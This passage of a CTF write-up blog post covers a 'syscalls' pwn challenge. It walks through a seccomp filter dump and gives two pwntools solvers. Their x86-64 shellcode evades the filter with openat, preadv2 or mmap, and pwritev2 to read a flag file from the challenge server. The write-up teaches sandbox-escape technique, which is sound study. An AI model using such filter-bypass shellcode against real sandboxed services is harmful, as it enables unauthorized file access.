punctuation\">(</span>in_FS_OFFSET <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  local_d8 <span class=\"token operator\">=</span> <span class=\"token number\">0x400000020</span><span class=\"token punctuation\">;</span>\n  local_d0 <span class=\"token operator\">=</span> <span class=\"token number\">0xc000003e16000015</span><span class=\"token punctuation\">;</span>\n  local_c8 <span class=\"token operator\">=</span> <span class=\"token number\">0x20</span><span class=\"token punctuation\">;</span>\n  local_c0 <span class=\"token operator\">=</span> <span class=\"token number\">0x4000000001000035</span><span class=\"token punctuation\">;</span>\n  local_b8 <span class=\"token operator\">=</span> <span class=\"token number\">0xffffffff13000015</span><span class=\"token punctuation\">;</span>\n  local_b0 <span class=\"token operator\">=</span> <span class=\"token number\">0x120015</span><span class=\"token punctuation\">;</span>\n  local_a8 <span class=\"token operator\">=</span> <span class=\"token number\">0x100110015</span><span class=\"token punctuation\">;</span>\n  local_a0 <span class=\"token operator\">=</span> <span class=\"token number\">0x200100015</span><span class=\"token punctuation\">;</span>\n  local_98 <span class=\"token operator\">=</span> <span class=\"token number\">0x11000f0015</span><span class=\"token punctuation\">;</span>\n  local_90 <span class=\"token operator\">=</span> <span class=\"token number\">0x13000e0015</span><span class=\"token punctuation\">;</span>\n  local_88 <span class=\"token operator\">=</span> <span class=\"token number\">0x28000d0015</span><span class=\"token punctuation\">;</span>\n  local_80 <span class=\"token operator\">=</span> <span class=\"token number\">0x39000c0015</span><span class=\"token punctuation\">;</span>\n  local_78 <span class=\"token operator\">=</span> <span class=\"token number\">0x3b000b0015</span><span class=\"token punctuation\">;</span>\n  local_70 <span class=\"token operator\">=</span> <span class=\"token number\">0x113000a0015</span><span class=\"token punctuation\">;</span>\n  local_68 <span class=\"token operator\">=</span> <span class=\"token number\">0x12700090015</span><span class=\"token punctuation\">;</span>\n  local_60 <span class=\"token operator\">=</span> <span class=\"token number\">0x12800080015</span><span class=\"token punctuation\">;</span>\n  local_58 <span class=\"token operator\">=</span> <span class=\"token number\">0x14200070015</span><span class=\"token punctuation\">;</span>\n  local_50 <span class=\"token operator\">=</span> <span class=\"token number\">0x1405000015</span><span class=\"token punctuation\">;</span>\n  local_48 <span class=\"token operator\">=</span> <span class=\"token number\">0x1400000020</span><span class=\"token punctuation\">;</span>\n  local_40 <span class=\"token operator\">=</span> <span class=\"token number\">0x30025</span><span class=\"token punctuation\">;</span>\n  local_38 <span class=\"token operator\">=</span> <span class=\"token number\">0x3000015</span><span class=\"token punctuation\">;</span>\n  local_30 <span class=\"token operator\">=</span> <span class=\"token number\">0x1000000020</span><span class=\"token punctuation\">;</span>\n  local_28 <span class=\"token operator\">=</span> <span class=\"token number\">0x3e801000025</span><span class=\"token punctuation\">;</span>\n  local_20 <span class=\"token operator\">=</span> <span class=\"token number\">0x7fff000000000006</span><span class=\"token punctuation\">;</span>\n  local_18 <span class=\"token operator\">=</span> <span class=\"token number\">6</span><span class=\"token punctuation\">;</span>\n  local_e0 <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>local_d8<span class=\"token punctuation\">;</span>\n  local_e8<span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token number\">0x19</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">prctl</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x26</span><span class=\"token punctuation\">,</span><span class=\"token number\">1</span><span class=\"token punctuation\">,</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  iVar1 <span class=\"token operator\">=</span> <span class=\"token function\">prctl</span><span class=\"token punctuation\">(</span><span class=\"token number\">0x16</span><span class=\"token punctuation\">,</span><span class=\"token number\">2</span><span class=\"token punctuation\">,</span>local_e8<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>local_10 <span class=\"token operator\">!=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">long</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span>in_FS_OFFSET <span class=\"token operator\">+</span> <span class=\"token number\">0x28</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n                    <span class=\"token comment\">/* WARNING: Subroutine does not return */</span>\n    <span class=\"token function\">__stack_chk_fail</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">return</span> iVar1<span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 736px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/eb6afb261af8a1d19db7ef65697a39bf/f941f/image-20240708182346883.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 74.58333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACiklEQVQ4y42UW1PiQBCFQaEUEMiVJOQ6IQkh4RJQaxW0ar2s+/9/0dnuVlH2YWsfUkmmZr4+c07PtBxnAtd1EEYB7IkNTddgmgaurgbQ6Xsw6KPdbqPVav3fk85SpKlCEAaYlwVmWYqiyDGj8d31FlmeCXxChQ1dx6B3ieFggCsqdEnfFxcX6Pf7X8B6Wb+DPgCr9QqbZo3lqsbb71dsdw10Q5eiKktw+7iDqiI4UxuWZcH3pzBoR0cgL1wsSiiVEGiDqq4ItsSiKrE/3AvYYKBKYQYmokOMeB8jKAKU87mIsWzrC1jMc2TZDH7gg7+jOBIITzw87KXYeDxCTOP6RIdTOYiTiAQo2s0S5+fnpx6yR+lMCZAhiYpJ3QJ5keF+fyfvEQHDMMTYHsNZOUgWMaIoIgGFhHgCzDkAUsihVDWBqAArLBdzPDzuJZSxNkZMAMPR4d/6iJYhOEyeP/U9tNrfgOwVJ6vI9Ga7EXXXNzusNyv8enuVN3vIoZmeieA2gKqV7IbDsyzzVCF7xNUSCWUtVTltBj2/PImv+gfQmlKqN6SQUi6yHM1uA89zBXTsVd4uG84elgRnC+plRQrmuLv/IcU0TRPPDMeA27jwSo/WxNKv3E4nCrkypxaEvvjG/+/gTIBZPpNQAt/HyBxJKJN8IieLgWEUirqjQl4QJzESelgZJ/ceSkmhHKSIRqFEBPB8FypP4E1d6Vs+Pd1uF51OB71eD2dnZ2ixZ+wTt06zbQTG4bCHx5NCRy6hXbBf3AVcNP9Qx33Y6Xa+H71KtsXQzzAYwuCn558SlG3bMiciAM/jS8QwDPG9//flwWeRbxuuzuEENImbe0rjHAxb8bmYe3U4HP7ztvkDTHmMFz0GFl0AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/eb6afb261af8a1d19db7ef65697a39bf/8ac56/image-20240708182346883.webp 240w,\n/static/eb6afb261af8a1d19db7ef65697a39bf/d3be9/image-20240708182346883.webp 480w,\n/static/eb6afb261af8a1d19db7ef65697a39bf/b8c12/image-20240708182346883.webp 736w\"\n              sizes=\"(max-width: 736px) 100vw, 736px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/eb6afb261af8a1d19db7ef65697a39bf/8ff5a/image-20240708182346883.png 240w,\n/static/eb6afb261af8a1d19db7ef65697a39bf/e85cb/image-20240708182346883.png 480w,\n/static/eb6afb261af8a1d19db7ef65697a39bf/f941f/image-20240708182346883.png 736w\"\n            sizes=\"(max-width: 736px) 100vw, 736px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/eb6afb261af8a1d19db7ef65697a39bf/f941f/image-20240708182346883.png\"\n            alt=\"image-20240708182346883\"\n            title=\"image-20240708182346883\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>In this seccomp filter, the part below is particularly interesting.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"> 0017: 0x15 0x00 0x05 0x00000014  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>A <span class=\"token operator\">!=</span> writev<span class=\"token punctuation\">)</span> goto 0023\n 0018: 0x20 0x00 0x00 0x00000014  A <span class=\"token operator\">=</span> fd <span class=\"token operator\">>></span> <span class=\"token number\">32</span> <span class=\"token comment\"># writev(fd, vec, vlen)</span>\n 0019: 0x25 0x03 0x00 0x00000000  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>A <span class=\"token operator\">></span> 0x0<span class=\"token punctuation\">)</span> goto 0023\n 0020: 0x15 0x00 0x03 0x00000000  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>A <span class=\"token operator\">!=</span> 0x0<span class=\"token punctuation\">)</span> goto 0024\n 0021: 0x20 0x00 0x00 0x00000010  A <span class=\"token operator\">=</span> fd <span class=\"token comment\"># writev(fd, vec, vlen)</span>\n 0022: 0x25 0x00 0x01 0x000003e8  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>A <span class=\"token operator\">&lt;=</span> 0x3e8<span class=\"token punctuation\">)</span> goto 0024\n 0023: 0x06 0x00 0x00 0x7fff0000  <span class=\"token builtin class-name\">return</span> ALLOW\n 0024: 0x06 0x00 0x00 0x00000000  <span class=\"token builtin class-name\">return</span> KIL</code></pre></div>\n<p>When the invoked system call is <code class=\"language-text\">writev</code>, it appears that the filter does not simply forbid it. Instead, it evaluates the <code class=\"language-text\">fd</code> argument to determine whether it should be allowed.</p>\n<h3 id=\"solution-1-using-openat-preadv2-and-pwritev2-with-an-iovec\" style=\"position:relative;\"><a href=\"#solution-1-using-openat-preadv2-and-pwritev2-with-an-iovec\" aria-label=\"solution 1 using openat preadv2 and pwritev2 with an iovec permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Solution 1: Using openat, preadv2, and pwritev2 with an iovec</h3>\n<p>Let’s think about how to exploit the binary while bypassing the seccomp filter in this challenge.</p>\n<p>In this binary, <code class=\"language-text\">open</code> is prohibited, but <code class=\"language-text\">openat</code> is not, so it looks like we can use it to obtain a file descriptor.</p>\n<p>Also, <code class=\"language-text\">preadv2</code> and <code class=\"language-text\">pwritev2</code>, which can serve as alternatives to <code class=\"language-text\">read</code> and <code class=\"language-text\">write</code> for retrieving the flag, do not seem to be prohibited.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;sys/uio.h></span></span>\n<span class=\"token class-name\">ssize_t</span> <span class=\"token function\">readv</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> fd<span class=\"token punctuation\">,</span> <span class=\"token keyword\">const</span> <span class=\"token keyword\">struct</span> <span class=\"token class-name\">iovec</span> <span class=\"token operator\">*</span>iov<span class=\"token punctuation\">,</span> <span class=\"token keyword\">int</span> iovcnt<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token class-name\">ssize_t</span> <span class=\"token function\">writev</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> fd<span class=\"token punctuation\">,</span> <span class=\"token keyword\">const</span> <span class=\"token keyword\">struct</span> <span class=\"token class-name\">iovec</span> <span class=\"token operator\">*</span>iov<span class=\"token punctuation\">,</span> <span class=\"token keyword\">int</span> iovcnt<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token class-name\">ssize_t</span> <span class=\"token function\">preadv</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> fd<span class=\"token punctuation\">,</span> <span class=\"token keyword\">const</span> <span class=\"token keyword\">struct</span> <span class=\"token class-name\">iovec</span> <span class=\"token operator\">*</span>iov<span class=\"token punctuation\">,</span> <span class=\"token keyword\">int</span> iovcnt<span class=\"token punctuation\">,</span> <span class=\"token class-name\">off_t</span> offset<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token class-name\">ssize_t</span> <span class=\"token function\">pwritev</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> fd<span class=\"token punctuation\">,</span> <span class=\"token keyword\">const</span> <span class=\"token keyword\">struct</span> <span class=\"token class-name\">iovec</span> <span class=\"token operator\">*</span>iov<span class=\"token punctuation\">,</span> <span class=\"token keyword\">int</span> iovcnt<span class=\"token punctuation\">,</span> <span class=\"token class-name\">off_t</span> offset<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n<span class=\"token class-name\">ssize_t</span> <span class=\"token function\">preadv2</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> fd<span class=\"token punctuation\">,</span> <span class=\"token keyword\">const</span> <span class=\"token keyword\">struct</span> <span class=\"token class-name\">iovec</span> <span class=\"token operator\">*</span>iov<span class=\"token punctuation\">,</span> <span class=\"token keyword\">int</span> iovcnt<span class=\"token punctuation\">,</span> <span class=\"token class-name\">off_t</span> offset<span class=\"token punctuation\">,</span> <span class=\"token keyword\">int</span> flags<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token class-name\">ssize_t</span> <span class=\"token function\">pwritev2</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> fd<span class=\"token punctuation\">,</span> <span class=\"token keyword\">const</span> <span class=\"token keyword\">struct</span> <span class=\"token class-name\">iovec</span> <span class=\"token operator\">*</span>iov<span class=\"token punctuation\">,</span> <span class=\"token keyword\">int</span> iovcnt<span class=\"token punctuation\">,</span> <span class=\"token class-name\">off_t</span> offset<span class=\"token punctuation\">,</span> <span class=\"token keyword\">int</span> flags<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>Reference: <a href=\"https://manpages.debian.org/testing/manpages-dev/preadv2.2.en.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">preadv2(2) — manpages-dev — Debian testing — Debian Manpages</a></p>\n<p>Reference: <a href=\"https://x64.syscall.sh/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">x64.syscall.sh</a></p>\n<p>Reference: <a href=\"https://ptr-yudai.hatenablog.com/entry/2019/09/20/111309\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">SEC-T CTF 2019 Writeup - Let’s Do CTF</a></p>\n<p><code class=\"language-text\">preadv</code> and <code class=\"language-text\">pwritev</code>, which are also prohibited in this binary, are system calls that can read from and write to buffers specified by <code class=\"language-text\">iov</code>, a pointer to an array of <code class=\"language-text\">iovec</code> structures.</p>\n<p>Aside from reading and writing data using multiple buffers via <code class=\"language-text\">iov</code>, they behave the same as <code class=\"language-text\">read</code> and <code class=\"language-text\">write</code>.</p>\n<p><code class=\"language-text\">preadv2</code> and <code class=\"language-text\">pwritev2</code> are extensions of those system calls. It seems that the differences are that they add a <code class=\"language-text\">flags</code> argument to modify the behavior of the syscall, and that if <code class=\"language-text\">-1</code> is specified, the current file offset (?) is used.</p>\n<blockquote>\n<p>These system calls are similar to preadv() and pwritev() calls, but add a fifth argument, flags, which modifies the behavior on a per-call basis.</p>\n<p>Unlike preadv() and pwritev(), if the offset argument is -1, then the current file offset is used and updated.</p>\n</blockquote>\n<p>Reference: <a href=\"https://manpages.debian.org/testing/manpages-dev/preadv2.2.en.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">preadv2(2) — manpages-dev — Debian testing — Debian Manpages</a></p>\n<p>Reference: <a href=\"https://ja.manpages.org/preadv/2\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">man preadv (2): reading and writing multiple buffers</a></p>\n<p>A solver using these system calls can be implemented as follows.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\ncontext<span class=\"token punctuation\">.</span>binary <span class=\"token operator\">=</span> exe <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span><span class=\"token string\">'./syscalls'</span><span class=\"token punctuation\">)</span>\n\ncode<span class=\"token operator\">=</span><span class=\"token triple-quoted-string string\">\"\"\"\n// openat(AT_FDCWD(-100), file, 0)\nmov rdi, -100\nlea rsi, [rip+filename] \nmov rdx, 0           \nmov rax, 257             \nsyscall                  \n\n// preadv2(fd, iov, 1, 0, 0)\nxor r10, r10\nxor r8, r8\nmov rdi, rax\npush 0x100\nmov r15, rsp\nadd r15, 0x100\npush r15\nmov rsi, rsp\nmov rdx, 1\nmov rax, 327\nsyscall\n\n// pwritev2(1, iov, 1, -1, 0)\nxor r8, r8\nmov r10, -1\nmov rdi, 1  \nmov rdx, 1\nmov rsi, rsp\nmov rax, 328               \nsyscall              \n\nfilename:\n    .string \"./flag.txt\"\n\"\"\"</span>\n\nshellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span>code<span class=\"token punctuation\">)</span>\n\ntarget <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"syscalls.chal.uiuc.tf\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">1337</span><span class=\"token punctuation\">,</span> ssl<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">)</span>\n\ntarget<span class=\"token punctuation\">.</span>sendlineafter<span class=\"token punctuation\">(</span><span class=\"token string\">\"you.\"</span><span class=\"token punctuation\">,</span> shellcode<span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>In the first section, setting the first argument to <code class=\"language-text\">AT_FDCWD(-100)</code> allows it to obtain the file descriptor for <code class=\"language-text\">./flag.txt</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"nasm\"><pre class=\"language-nasm\"><code class=\"language-nasm\"><span class=\"token operator\">/</span><span class=\"token operator\">/</span> openat(AT_FDCWD(<span class=\"token operator\">-</span><span class=\"token number\">100</span>), file, <span class=\"token number\">0</span>)\nmov <span class=\"token register variable\">rdi</span>, <span class=\"token operator\">-</span><span class=\"token number\">100</span>\nlea <span class=\"token register variable\">rsi</span>, <span class=\"token operator\">[</span>rip<span class=\"token operator\">+</span>filename<span class=\"token operator\">]</span> \nmov <span class=\"token register variable\">rdx</span>, <span class=\"token number\">0</span>           \nmov <span class=\"token register variable\">rax</span>, <span class=\"token number\">257</span>             \nsyscall      </code></pre></div>\n<p>In the following sections, <code class=\"language-text\">preadv2</code> and <code class=\"language-text\">pwritev2</code> are used to send the flag read from the file to standard output.</p>\n<p>Running this solver allows you to obtain the flag as shown below.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/634e36dbdbc777849eb0a82130803e5b/01ccc/image-20240708223240998.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 19.166666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAtUlEQVQY01WP2w6DMAxDWyRKuT0wkGADBi3Xsf//Pi/JGNIejpy4tdWqafKYxwEH4e4N6qYWqqpEWd6IEnmeIUkShGGIKIpgrRXYM8aIih9bqL7v0HYtBjfiQcolxa2QABcwHJLdcKGRMHs/eOd71kZQ275i3RbspMf7JbOj8mVdMC8TnB8hv6B5mr/qvcMwPOnMiefpfKQMq0rTFEycxMiyVF6itYYO9KVBEPx7J5d/zkppfAD9Dl92IHfhCQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/634e36dbdbc777849eb0a82130803e5b/8ac56/image-20240708223240998.webp 240w,\n/static/634e36dbdbc777849eb0a82130803e5b/d3be9/image-20240708223240998.webp 480w,\n/static/634e36dbdbc777849eb0a82130803e5b/e46b2/image-20240708223240998.webp 960w,\n/static/634e36dbdbc777849eb0a82130803e5b/d802c/image-20240708223240998.webp 1399w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/634e36dbdbc777849eb0a82130803e5b/8ff5a/image-20240708223240998.png 240w,\n/static/634e36dbdbc777849eb0a82130803e5b/e85cb/image-20240708223240998.png 480w,\n/static/634e36dbdbc777849eb0a82130803e5b/d9199/image-20240708223240998.png 960w,\n/static/634e36dbdbc777849eb0a82130803e5b/01ccc/image-20240708223240998.png 1399w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/634e36dbdbc777849eb0a82130803e5b/d9199/image-20240708223240998.png\"\n            alt=\"image-20240708223240998\"\n            title=\"image-20240708223240998\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h3 id=\"solution-2-using-openat-mmap-and-pwritev2-with-an-iovec\" style=\"position:relative;\"><a href=\"#solution-2-using-openat-mmap-and-pwritev2-with-an-iovec\" aria-label=\"solution 2 using openat mmap and pwritev2 with an iovec permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Solution 2: Using openat, mmap, and pwritev2 with an iovec</h3>\n<p>Using the writeup as a reference, I also tried an alternative approach that uses <code class=\"language-text\">mmap</code> instead of <code class=\"language-text\">preadv2</code>.</p>\n<p>It seems that by using <code class=\"language-text\">mmap</code>, you can read data from a file into memory even when <code class=\"language-text\">read</code> cannot be used.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;sys/mman.h></span></span>\n\n<span class=\"token keyword\">void</span> <span class=\"token operator\">*</span><span class=\"token function\">mmap</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">void</span> addr<span class=\"token punctuation\">[</span><span class=\"token punctuation\">.</span>length<span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token class-name\">size_t</span> length<span class=\"token punctuation\">,</span> <span class=\"token keyword\">int</span> prot<span class=\"token punctuation\">,</span> <span class=\"token keyword\">int</span> flags<span class=\"token punctuation\">,</span> <span class=\"token keyword\">int</span> fd<span class=\"token punctuation\">,</span> <span class=\"token class-name\">off_t</span> offset<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>Reference: <a href=\"https://man7.org/linux/man-pages/man2/mmap.2.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">mmap(2) - Linux manual page</a></p>\n<p>Reference: <a href=\"https://corgi-lab.com/programming/c-lang/use-mmap/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Trying <code class=\"language-text\">mmap</code> for file I/O - Corgi Lab. ~A technical blog for notes~</a></p>\n<p>For that reason, the following code—where the part of the shellcode in Solution 1 that uses <code class=\"language-text\">preadv2</code> is simply replaced with <code class=\"language-text\">mmap</code>—can also retrieve the flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\ncontext<span class=\"token punctuation\">.</span>binary <span class=\"token operator\">=</span> exe <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span><span class=\"token string\">'./syscalls'</span><span class=\"token punctuation\">)</span>\n\ncode<span class=\"token operator\">=</span><span class=\"token triple-quoted-string string\">\"\"\"\nlea rsi, [rip+filename]\nmov rdi, 0\nxor rdx, rdx\nmov rax, 257\nsyscall\n\n// mmap(addr=0, length=0x1000, prot=PROT_READ (1), flags=MAP_PRIVATE (2), fd='rax', offset=0)\npush 2\npop r10\nmov r8, rax\nxor r9, r9\nxor edi, edi\nmov rdx, 1\nmov rsi, 4096\npush 9\npop rax\nsyscall\n\n/* pwritev2(vararg_0=1, vararg_1='rsp', vararg_2=1, vararg_3=-1, vararg_4=0) */\npush 0x100\npush rax\nmov r10, -1\nxor r8, r8\nmov rdi, 1\nmov rsi, rsp\nmov rdx, rdi\nmov rax, 328\nsyscall\n\nfilename:\n    .string \"/home/user/flag.txt\"\n\"\"\"</span>\n\nshellcode <span class=\"token operator\">=</span> asm<span class=\"token punctuation\">(</span>code<span class=\"token punctuation\">)</span>\n\ntarget <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"syscalls.chal.uiuc.tf\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">1337</span><span class=\"token punctuation\">,</span> ssl<span class=\"token operator\">=</span><span class=\"token boolean\">True</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendlineafter<span class=\"token punctuation\">(</span><span class=\"token string\">\"you.\"</span><span class=\"token punctuation\">,</span> shellcode<span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/dd967deeb31b60eb62e6bb09ee833aeb/19a15/image-20240708195518246.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 37.916666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABKElEQVQoz5WR3VKDMBCFMxAChEChnYYAbdXRhgqF+v4vd9wktt44Ol58c3Y3f7sn7GQ1hmeDF3vB06tFOxyhu4Nnbwa0pkPXG2w2G+R5DsbY75i2h1Qx+iGBqvjfB/5i32rUkuPUCGjSXKQQaYqUcB3JQqIg0iwFTzjiOEYUR6SRjx2cc0RRyJkdLS4OazGRjuMZ48XibN9QNzWapvHjllWJsiyRZRk9Jh4POgpVQAgRLOl751GHw/HgMZ3BbrfFdtsgSZJHBw6X33EX/KRsWRcs6xXT/I55njBfJ1yX2dfWW1i7x7ePlda+60GXx353B3Pd1XVNPhVQpfLtK6U8vuZiqldVRSOrr9GD5jL4G3wu/FnWmhZaa5o/C59Am6TMfZ45yLP//PInmjy7oZ+1r94AAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/dd967deeb31b60eb62e6bb09ee833aeb/8ac56/image-20240708195518246.webp 240w,\n/static/dd967deeb31b60eb62e6bb09ee833aeb/d3be9/image-20240708195518246.webp 480w,\n/static/dd967deeb31b60eb62e6bb09ee833aeb/e46b2/image-20240708195518246.webp 960w,\n/static/dd967deeb31b60eb62e6bb09ee833aeb/24859/image-20240708195518246.webp 1229w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/dd967deeb31b60eb62e6bb09ee833aeb/8ff5a/image-20240708195518246.png 240w,\n/static/dd967deeb31b60eb62e6bb09ee833aeb/e85cb/image-20240708195518246.png 